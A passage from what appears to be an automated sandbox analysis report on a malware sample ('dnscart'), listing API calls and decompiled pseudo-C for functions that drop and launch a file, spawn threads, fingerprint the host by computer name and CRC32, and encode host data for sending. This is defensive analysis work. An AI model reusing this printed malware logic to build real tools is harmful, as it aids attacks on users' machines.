0x001f9042
0x001f9055
0x001f905b
0x001f9063
0x001f906d
0x001f906f
0x001f907b
0x001f9087
0x00000000
0x00000000
0x001f8e4b
0x001f8e45
0x00000000

APIs

GetTickCount.KERNEL32 ref: 001F8E2A
SetEvent.KERNEL32 ref: 001F8E84
lstrlen.KERNEL32 ref: 001F8F26
HeapFree.KERNEL32(00000000), ref: 001F9087

Part of subcall function 001F88F0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001F8908

Part of subcall function 001FA7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001FA7B8
Part of subcall function 001FA7A0: CloseHandle.KERNEL32(?), ref: 001FA7CC
Part of subcall function 001FA7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001F8F95), ref: 001FA7D5
Part of subcall function 001FA7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001FA7DC

GetProcessHeap.KERNEL32(00000000,?), ref: 001F8FF2
HeapFree.KERNEL32(00000000), ref: 001F8FF9
GetProcessHeap.KERNEL32(00000000,?), ref: 001F9028
HeapFree.KERNEL32(00000000), ref: 001F902F
GetProcessHeap.KERNEL32(00000000,?), ref: 001F903B
HeapFree.KERNEL32(00000000), ref: 001F9042
GetProcessHeap.KERNEL32(00000000,?), ref: 001F904E
HeapFree.KERNEL32(00000000), ref: 001F9055
GetTickCount.KERNEL32 ref: 001F9063
GetProcessHeap.KERNEL32(00000000,?), ref: 001F9080

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F94C1, Relevance: 19.6, APIs: 13, Instructions: 76

APIs

_snwprintf.NTDLL ref: 001F94DE
GetProcessHeap.KERNEL32(00000000,?), ref: 001F94EA
HeapFree.KERNEL32(00000000), ref: 001F94F1
_snwprintf.NTDLL ref: 001F950F
GetProcessHeap.KERNEL32(00000000,?), ref: 001F951B
HeapFree.KERNEL32(00000000), ref: 001F9522
CreateFileW.KERNEL32(001FC9C8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001F953C
GetComputerNameW.KERNEL32(?,?), ref: 001F95B1
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 001F9601
RtlAllocateHeap.NTDLL(00000000), ref: 001F9608
_snprintf.NTDLL ref: 001F9642
GetProcessHeap.KERNEL32(00000000,00000010), ref: 001F964E
HeapFree.KERNEL32(00000000), ref: 001F9655

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F9AF1, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58

APIs

memset.NTDLL ref: 001F9AF9
memset.NTDLL ref: 001F9B07
GetLastError.KERNEL32 ref: 001F9B28
GetTickCount.KERNEL32 ref: 001F9B37
_snwprintf.NTDLL ref: 001F9B8E
GetProcessHeap.KERNEL32(00000000,?), ref: 001F9B9A
HeapFree.KERNEL32(00000000), ref: 001F9BA1
GetLastError.KERNEL32 ref: 001F9BB8

Strings

D, xrefs: 001F9B10

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001FA658, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 42
processfile

C-Code - Quality: 56%

			E001FA658() {
				void* _t22;
				void* _t24;
				void* _t26;

				WriteFile();
				CloseHandle(_t24);
				memset(_t26 - 0x5c, 0, 0x44);
				 *(_t26 - 0x5c) = 0x44;
				if(CreateProcessW(_t26 - 0x320, 0, 0, 0, 0, 0, 0, 0, _t26 - 0x5c, _t26 - 0x18) != 0) {
					CloseHandle( *(_t26 - 0x18));
					_push( *((intOrPtr*)(_t26 - 0x14)));
					CloseHandle();
				}
				HeapFree(GetProcessHeap(), 0, _t22);
				return 0;
			}

0x001fa658
0x001fa65f
0x001fa66d
0x001fa676
0x001fa6a2
0x001fa6a7
0x001fa6ad
0x001fa6b0
0x001fa6b0
0x001fa6c0
0x001fa6ce

APIs

WriteFile.KERNEL32 ref: 001FA658
CloseHandle.KERNEL32 ref: 001FA65F
memset.NTDLL ref: 001FA66D
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001FA69A
CloseHandle.KERNEL32(?), ref: 001FA6A7
CloseHandle.KERNEL32(?), ref: 001FA6B0
GetProcessHeap.KERNEL32(00000000), ref: 001FA6B9
HeapFree.KERNEL32(00000000), ref: 001FA6C0

Strings

D, xrefs: 001FA676

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001FA6E0, Relevance: 15.1, APIs: 10, Instructions: 65
thread

C-Code - Quality: 100%

			E001FA6E0(void* __ecx) {
				void* _t15;
				void* _t22;
				void _t25;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t33;

				_t31 = __ecx;
				_t15 = RtlAllocateHeap(GetProcessHeap(), 8,  *((intOrPtr*)(__ecx + 0xc)) + 0x10);
				_t33 = _t15;
				if(_t33 == 0) {
					return _t15;
				} else {
					 *_t33 =  *_t31;
					 *((intOrPtr*)(_t33 + 4)) =  *((intOrPtr*)(_t31 + 4));
					_t4 = _t33 + 0x10; // 0x10
					_t29 = _t4;
					 *(_t33 + 8) = _t29;
					 *(_t33 + 0xc) =  *(_t31 + 0xc);
					memcpy(_t29,  *(_t31 + 8),  *(_t31 + 0xc));
					_t32 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
					if(_t32 == 0) {
						L5:
						return HeapFree(GetProcessHeap(), 0, _t33);
					}
					 *(_t32 + 4) =  *_t33;
					_t22 = CreateThread(0, 0, 0x1fa3f0, _t33, 0, 0);
					 *(_t32 + 8) = _t22;
					if(_t22 == 0) {
						HeapFree(GetProcessHeap(), 0, _t32);
						goto L5;
					}
					_t25 =  *0x1fcbd4; // 0x0
					 *_t32 = _t25;
					 *0x1fcbd4 = _t32;
					return _t25;
				}
			}

0x001fa6e2
0x001fa6f4
0x001fa6fa
0x001fa6fe
0x001fa793
0x001fa704
0x001fa706
0x001fa70b
0x001fa70e
0x001fa70e
0x001fa711
0x001fa717
0x001fa721
0x001fa73b
0x001fa73f
0x001fa781
0x00000000
0x001fa78b
0x001fa751
0x001fa754
0x001fa75a
0x001fa75f
0x001fa77b
0x00000000
0x001fa77b
0x001fa761
0x001fa766
0x001fa768
0x001fa770
0x001fa770

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 001FA6ED
RtlAllocateHeap.NTDLL(00000000), ref: 001FA6F4
memcpy.NTDLL(00000010,?,?), ref: 001FA721
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 001FA72E
RtlAllocateHeap.NTDLL(00000000), ref: 001FA735
CreateThread.KERNEL32(00000000,00000000,Function_0000A3F0,00000000,00000000,00000000), ref: 001FA754
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001FA774
HeapFree.KERNEL32(00000000), ref: 001FA77B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001FA784
HeapFree.KERNEL32(00000000), ref: 001FA78B

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F91F0, Relevance: 15.1, APIs: 10, Instructions: 64time

APIs

CreateEventW.KERNEL32 ref: 001F91F0
SignalObjectAndWait.KERNEL32(00000000,000000FF,00000000), ref: 001F920A
ResetEvent.KERNEL32 ref: 001F9221
ReleaseMutex.KERNEL32 ref: 001F922A
CloseHandle.KERNEL32 ref: 001F9231
GetTickCount.KERNEL32 ref: 001F923B
CreateTimerQueueTimer.KERNEL32(?,00000000,Function_00008E20,00000000,00001388,000003E8,00000010), ref: 001F926E
WaitForSingleObject.KERNEL32(000000FF), ref: 001F9280
DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 001F928D
CloseHandle.KERNEL32 ref: 001F9299

Part of subcall function 001FA7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001FA7B8
Part of subcall function 001FA7A0: CloseHandle.KERNEL32(?), ref: 001FA7CC
Part of subcall function 001FA7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001F8F95), ref: 001FA7D5
Part of subcall function 001FA7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001FA7DC

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001FA515, Relevance: 15.0, APIs: 10, Instructions: 50
file

C-Code - Quality: 26%

			E001FA515(void* __edi, void* __eflags) {
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t37;

				_t32 = __edi;
				WriteFile(??, ??, ??, ??, ??);
				CloseHandle(_t34);
				L001F1830(0x1f1398, 4);
				_t35 =  *(_t37 - 4);
				 *0x1fc20c(_t37 - 0x528, 0x104, _t35, _t37 - 0x320, 0x6e15c1da, _t37 - 4);
				HeapFree(GetProcessHeap(), 0, _t35);
				_push(_t37 - 0x18);
				_push( *((intOrPtr*)(_t37 + 8)));
				if(L001F21B0(_t37 - 0x528, _t32) != 0) {
					CloseHandle( *(_t37 - 0x18));
					CloseHandle( *(_t37 - 0x14));
				}
				_push( *((intOrPtr*)(_t37 + 8)));
				CloseHandle();
				HeapFree(GetProcessHeap(), 0, _t32);
				return 0;
			}

0x001fa515
0x001fa515
0x001fa51c
0x001fa535
0x001fa53a
0x001fa551
0x001fa564
0x001fa56d
0x001fa56e
0x001fa581
0x001fa586
0x001fa58f
0x001fa58f
0x001fa595
0x001fa6b0
0x001fa6c0
0x001fa6ce

APIs

WriteFile.KERNEL32 ref: 001FA515
CloseHandle.KERNEL32 ref: 001FA51C
_snwprintf.NTDLL ref: 001FA551
GetProcessHeap.KERNEL32(00000000,?), ref: 001FA55D
HeapFree.KERNEL32(00000000), ref: 001FA564
CloseHandle.KERNEL32(?), ref: 001FA586
CloseHandle.KERNEL32(?), ref: 001FA58F
CloseHandle.KERNEL32(?), ref: 001FA6B0
GetProcessHeap.KERNEL32(00000000), ref: 001FA6B9
HeapFree.KERNEL32(00000000), ref: 001FA6C0

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F8BFA, Relevance: 12.1, APIs: 8, Instructions: 91string

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 001F8C28
lstrlenW.KERNEL32(?), ref: 001F8C35
lstrlenW.KERNEL32(00000004), ref: 001F8C84
GetProcessHeap.KERNEL32(00000008,00000000), ref: 001F8CA0
RtlAllocateHeap.NTDLL(00000000), ref: 001F8CA7
lstrcmpiW.KERNEL32(00000004,?), ref: 001F8CC5
lstrcpyW.KERNEL32(00000000,00000004), ref: 001F8CDA
lstrlenW.KERNEL32(00000004), ref: 001F8CE4

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001FA402, Relevance: 12.1, APIs: 8, Instructions: 76

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 001FA420
GetTickCount.KERNEL32 ref: 001FA5BB
_snwprintf.NTDLL ref: 001FA60E
GetProcessHeap.KERNEL32(00000000,?), ref: 001FA61A
HeapFree.KERNEL32(00000000), ref: 001FA621
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 001FA640
GetProcessHeap.KERNEL32(00000000), ref: 001FA6B9
HeapFree.KERNEL32(00000000), ref: 001FA6C0

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001FA46E, Relevance: 12.1, APIs: 8, Instructions: 58

C-Code - Quality: 26%

			E001FA46E(void* __edi, void* __eflags) {
				signed int _t22;
				void* _t28;
				void* _t59;
				void* _t63;
				void* _t64;
				void* _t66;
				void* _t67;

				_t59 = __edi;
				 *0x1fc214();
				_t22 = GetTickCount();
				_t2 = (_t22 & 0x00000007) + 1; // 0x1
				L001F2270(_t67 - 0x98, _t2);
				 *((short*)(_t67 + (_t22 & 0x00000007) * 2 - 0x96)) = 0;
				L001F1830(0x1f15a4, 0xc);
				_t63 =  *(_t67 - 4);
				_t28 = _t67 - 0x320;
				 *0x1fc20c(_t28, 0x104, _t63, _t28, _t67 - 0x98, 0x6e15c1da, _t67 - 4);
				HeapFree(GetProcessHeap(), 0, _t63);
				_t64 = CreateFileW(_t67 - 0x320, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t64 != 0xffffffff) {
					goto 0x331e83;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					WriteFile();
					CloseHandle(_t64);
					L001F1830(0x1f1398, 4);
					_t66 =  *(_t67 - 4);
					 *0x1fc20c(_t67 - 0x528, 0x104, _t66, _t67 - 0x320, 0x6e15c1da, _t67 - 4);
					HeapFree(GetProcessHeap(), 0, _t66);
					_push(_t67 - 0x18);
					_push( *((intOrPtr*)(_t67 + 8)));
					if(L001F21B0(_t67 - 0x528, _t59) != 0) {
						CloseHandle( *(_t67 - 0x18));
						CloseHandle( *(_t67 - 0x14));
					}
				}
				_push( *((intOrPtr*)(_t67 + 8)));
				CloseHandle();
				HeapFree(GetProcessHeap(), 0, _t59);
				return 0;
			}

0x001fa46e
0x001fa46e
0x001fa474
0x001fa485
0x001fa488
0x001fa494
0x001fa4aa
0x001fa4af
0x001fa4b9
0x001fa4c7
0x001fa4da
0x001fa4ff
0x001fa504
0x001fa50a
0x001fa50f
0x001fa510
0x001fa511
0x001fa512
0x001fa513
0x001fa514
0x001fa515
0x001fa51c
0x001fa535
0x001fa53a
0x001fa551
0x001fa564
0x001fa56d
0x001fa56e
0x001fa581
0x001fa586
0x001fa58f
0x001fa58f
0x001fa581
0x001fa595
0x001fa6b0
0x001fa6c0
0x001fa6ce

APIs

GetTickCount.KERNEL32 ref: 001FA474
_snwprintf.NTDLL ref: 001FA4C7
GetProcessHeap.KERNEL32(00000000,?), ref: 001FA4D3
HeapFree.KERNEL32(00000000), ref: 001FA4DA
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 001FA4F9
CloseHandle.KERNEL32(?), ref: 001FA6B0
GetProcessHeap.KERNEL32(00000000), ref: 001FA6B9
HeapFree.KERNEL32(00000000), ref: 001FA6C0

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F9150, Relevance: 10.6, APIs: 7, Instructions: 60

APIs

_snwprintf.NTDLL ref: 001F9168
GetProcessHeap.KERNEL32(00000000,?), ref: 001F9174
HeapFree.KERNEL32(00000000), ref: 001F917B
_snwprintf.NTDLL ref: 001F91AC
GetProcessHeap.KERNEL32(00000000,?), ref: 001F91B8
HeapFree.KERNEL32(00000000), ref: 001F91BF
CreateMutexW.KERNEL32(00000000,00000000,?), ref: 001F91D0

Part of subcall function 001FA7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001FA7B8
Part of subcall function 001FA7A0: CloseHandle.KERNEL32(?), ref: 001FA7CC
Part of subcall function 001FA7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001F8F95), ref: 001FA7D5
Part of subcall function 001FA7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001FA7DC

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F85E1, Relevance: 10.5, APIs: 7, Instructions: 45

C-Code - Quality: 20%

			E001F85E1(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __eflags) {
				signed char* _t28;
				void* _t30;
				void _t49;
				intOrPtr _t52;
				void* _t53;
				signed char* _t56;
				void* _t58;
				intOrPtr* _t64;
				void* _t66;
				void* _t67;
				void* _t69;

				_t64 = __edi;
				_t53 = __ebx;
				L001F1830(__ecx, __edx);
				_t56 =  *0x1fc298; // 0x0
				_t66 =  *(_t69 + 8);
				 *0x1fc20c(_t69 - 0xb8, 0x40, _t66, _t56[3] & 0x000000ff, _t56[2] & 0x000000ff, _t56[1] & 0x000000ff,  *_t56 & 0x000000ff);
				HeapFree(GetProcessHeap(), 0, _t66);
				_t28 =  *0x1fc298; // 0x0
				_t61 = _t69 - 0xb8;
				_push(_t56);
				_t57 = _t69 - 0x38;
				_push(_t28[4] & 0x0000ffff);
				_t30 = L001F1C50(_t69 - 0x38, _t69 - 0xb8, _t64);
				_t67 =  *(_t69 - 8);
				if(_t30 != 0) {
					goto 0x33165c;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					if(L001F1D40(_t57) != 0) {
						goto 0x331674;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						if(L001F1E80(_t41, _t57, _t61) != 0) {
							goto 0x33168c;
							asm("int3");
							asm("int3");
							if(L001F2560(_t61, _t64) != 0) {
								_t58 =  *(_t69 - 0x10);
								_t49 =  *_t58;
								 *_t53 = _t49;
								if(_t49 < 0x4000000) {
									_push(_t53);
									_t52 = L001F8500(_t58 + 4,  *((intOrPtr*)(_t69 - 0xc)) - 4, _t64);
									_t58 =  *(_t69 - 0x10);
									 *_t64 = _t52;
								}
								HeapFree(GetProcessHeap(), 0, _t58);
							}
							HeapFree(GetProcessHeap(), ??, ??);
						}
						 *0x1fc260( *((intOrPtr*)(_t69 - 0x30)));
					}
					 *0x1fc260( *((intOrPtr*)(_t69 - 0x34)));
					 *0x1fc260( *((intOrPtr*)(_t69 - 0x38)));
				}
				HeapFree(GetProcessHeap(), 0, 0);
				HeapFree(GetProcessHeap(), 0, _t67);
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				return 0 |  *_t64 != 0x00000000;
			}

0x001f85e1
0x001f85e1
0x001f85e1
0x001f85e6
0x001f85ec
0x001f860c
0x001f861f
0x001f8625
0x001f862a
0x001f8630
0x001f8631
0x001f8638
0x001f8639
0x001f863e
0x001f8646
0x001f864c
0x001f8651
0x001f8652
0x001f8653
0x001f8654
0x001f8655
0x001f8660
0x001f8662
0x001f8667
0x001f8668
0x001f8669
0x001f866a
0x001f866b
0x001f8676
0x001f8678
0x001f867d
0x001f867e
0x001f8689
0x001f868b
0x001f868e
0x001f8690
0x001f8697
0x001f869f
0x001f86a3
0x001f86a8
0x001f86ae
0x001f86ae
0x001f86ba
0x001f86ba
0x001f86cc
0x001f86cc
0x001f86d5
0x001f86d5
0x001f86de
0x001f86e7
0x001f86e7
0x001f86f8
0x001f8708
0x001f871a
0x001f872c
0x001f873f

APIs

_snwprintf.NTDLL ref: 001F860C
GetProcessHeap.KERNEL32(00000000,?), ref: 001F8618
HeapFree.KERNEL32(00000000), ref: 001F861F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F86F1
HeapFree.KERNEL32(00000000), ref: 001F86F8
GetProcessHeap.KERNEL32(00000000,?), ref: 001F8701
HeapFree.KERNEL32(00000000), ref: 001F8708

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001F9569, Relevance: 10.5, APIs: 7, Instructions: 31
file

C-Code - Quality: 34%

			E001F9569(signed short __edx, void* __edi, void* __esi) {
				int _t13;
				signed int _t20;
				void* _t24;
				signed short* _t26;
				signed short _t27;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;

				_t29 = __esi;
				_t28 = __edi;
				_t27 = __edx;
				_t24 = MapViewOfFile(??, ??, ??, ??, ??);
				if(_t24 != 0) {
					 *0x1fcbd0 = RtlComputeCrc32(0, _t24, GetFileSize(__esi, 0));
					UnmapViewOfFile(_t24);
				}
				CloseHandle(_t28);
				CloseHandle(_t29);
				 *(_t31 - 8) = 0x10;
				_t13 = GetComputerNameW(_t31 - 0x28, _t31 - 8);
				if(_t13 != 0) {
					_t26 = _t31 - 0x28;
					if( *(_t31 - 0x28) != 0) {
						goto 0x3319f0;
						asm("int3");
						do {
							_t20 =  *_t26 & 0x0000ffff;
							if(_t20 < 0x30 || _t20 > 0x39) {
								if(_t20 < 0x61 || _t20 > 0x7a) {
									if(_t20 < 0x41 || _t20 > 0x5a) {
										 *_t26 = _t27;
									}
								}
							}
							_t26 =  &(_t26[1]);
						} while ( *_t26 != 0);
					}
					_t30 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
					if(_t30 == 0) {
						_t30 =  *(_t31 - 8);
					} else {
						goto 0x331a04;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("stosd");
						asm("int3");
						E001F1790(_t26, _t27);
						_t32 = _t32 + 8;
					}
					 *0x1fc1f8(0x1fc2a8, 0x104, _t30, _t31 - 0x28,  *0x1fc3ac);
					_t13 = HeapFree(GetProcessHeap(), 0, _t30);
				}
				goto 0x331a1e;
				return _t13;
			}

0x001f9569
0x001f9569
0x001f9569
0x001f956f
0x001f9573
0x001f9589
0x001f958e
0x001f958e
0x001f9595
0x001f959c
0x001f95a5
0x001f95b1
0x001f95ba
0x001f95c5
0x001f95c8
0x001f95ca
0x001f95cf
0x001f95d0
0x001f95d0
0x001f95d6
0x001f95e0
0x001f95ea
0x001f95f1
0x001f95f1
0x001f95ea
0x001f95e0
0x001f95f4
0x001f95f7
0x001f95d0
0x001f960e
0x001f9612
0x001f962a
0x001f9614
0x001f9614
0x001f9619
0x001f961a
0x001f961b
0x001f961c
0x001f961d
0x001f961e
0x001f961f
0x001f9620
0x001f9625
0x001f9625
0x001f9642
0x001f9655
0x001f9655
0x001f965b
0x001f9660

APIs

MapViewOfFile.KERNEL32 ref: 001F9569
GetFileSize.KERNEL32(?,00000000), ref: 001F9578
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 001F9582
UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 001F958E
CloseHandle.KERNEL32 ref: 001F9595
CloseHandle.KERNEL32 ref: 001F959C
GetComputerNameW.KERNEL32(?,?), ref: 001F95B1
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 001F9601
RtlAllocateHeap.NTDLL(00000000), ref: 001F9608
_snprintf.NTDLL ref: 001F9642
GetProcessHeap.KERNEL32(00000000,00000010), ref: 001F964E
HeapFree.KERNEL32(00000000), ref: 001F9655

Memory Dump Source

Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

Function 001FA037, Relevance: 9.2, APIs: 6, Instructions: 161

C-Code - Quality: 100%

			E001FA037(unsigned int __eax, void* __ebx, void* __ecx, void* __edx, signed char* __edi) {
				unsigned int _t31;
				unsigned int _t32;
				long _t41;
				signed char _t52;
				signed char _t54;
				signed char _t56;
				signed char _t58;
				signed char _t60;
				void* _t62;
				intOrPtr* _t63;
				int _t65;
				int _t66;
				int _t67;
				void* _t68;
				signed char _t69;
				signed char _t71;
				signed char _t73;
				signed char _t75;
				signed char _t77;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				int _t83;
				signed char* _t84;
				void* _t86;
				char* _t89;
				signed char* _t91;
				signed char* _t92;
				void* _t93;
				char* _t94;
				signed char* _t95;
				void* _t96;
				char* _t97;
				signed char* _t98;
				void* _t99;
				char* _t100;
				signed char* _t101;
				void* _t103;

				_t84 = __edi;
				_t79 = __edx;
				_t68 = __ecx;
				_t62 = __ebx;
				_t31 = __eax;
				if(__eax > 0x7f) {
					do {
						_t31 = _t31 >> 7;
						_t62 = _t62 + 1;
					} while (_t31 > 0x7f);
				}
				_t32 = _t84[0x28];
				 *((intOrPtr*)(_t103 - 4)) = 1;
				while(_t32 > 0x7f) {
					 *((intOrPtr*)(_t103 - 4)) =  *((intOrPtr*)(_t103 - 4)) + 1;
					_t32 = _t32 >> 7;
				}
				_t63 =  *((intOrPtr*)(_t103 - 0xc));
				_t41 = _t84[0x28] + _t84[0x20] + _t84[0x18] + _t84[8] +  *((intOrPtr*)(_t103 - 4)) + _t62 + _t79 + _t68 +  *((intOrPtr*)(_t103 - 8)) + 0xf;
				 *(_t63 + 4) = _t41;
				_t89 = RtlAllocateHeap(GetProcessHeap(), 0, _t41);
				 *_t63 = _t89;
				if(_t89 != 0) {
					 *_t89 = 8;
					_t91 = _t89 + 1;
					_t69 =  *_t84;
					while(_t69 > 0x7f) {
						_t60 = _t69;
						_t69 = _t69 >> 7;
						 *_t91 = _t60 | 0x00000080;
						_t91 =  &(_t91[1]);
					}
					 *_t91 = _t69 & 0x0000007f;
					_t91[1] = 0x12;
					_t92 =  &(_t91[2]);
					_t65 = _t84[8];
					_t71 = _t65;
					_t80 = _t84[4];
					if(_t65 > 0x7f) {
						do {
							_t58 = _t71;
							_t71 = _t71 >> 7;
							 *_t92 = _t58 | 0x00000080;
							_t92 =  &(_t92[1]);
						} while (_t71 > 0x7f);
					}
					 *_t92 = _t71 & 0x0000007f;
					_t93 =  &(_t92[1]);
					memcpy(_t93, _t80, _t65);
					_t94 = _t93 + _t65;
					 *_t94 = 0x1d;
					 *(_t94 + 1) = _t84[0xc];
					 *((char*)(_t94 + 5)) = 0x25;
					 *(_t94 + 6) = _t84[0x10];
					 *((char*)(_t94 + 0xa)) = 0x2a;
					_t95 = _t94 + 0xb;
					_t66 = _t84[0x18];
					_t73 = _t66;
					_t81 = _t84[0x14];
					if(_t66 > 0x7f) {
						do {
							_t56 = _t73;
							_t73 = _t73 >> 7;
							 *_t95 = _t56 | 0x00000080;
							_t95 =  &(_t95[1]);
						} while (_t73 > 0x7f);
					}
					 *_t95 = _t73 & 0x0000007f;
					_t96 =  &(_t95[1]);
					memcpy(_t96, _t81, _t66);
					_t97 = _t96 + _t66;
					 *_t97 = 0x32;
					_t98 = _t97 + 1;
					_t67 = _t84[0x20];
					_t75 = _t67;
					_t82 = _t84[0x1c];
					if(_t67 > 0x7f) {
						do {
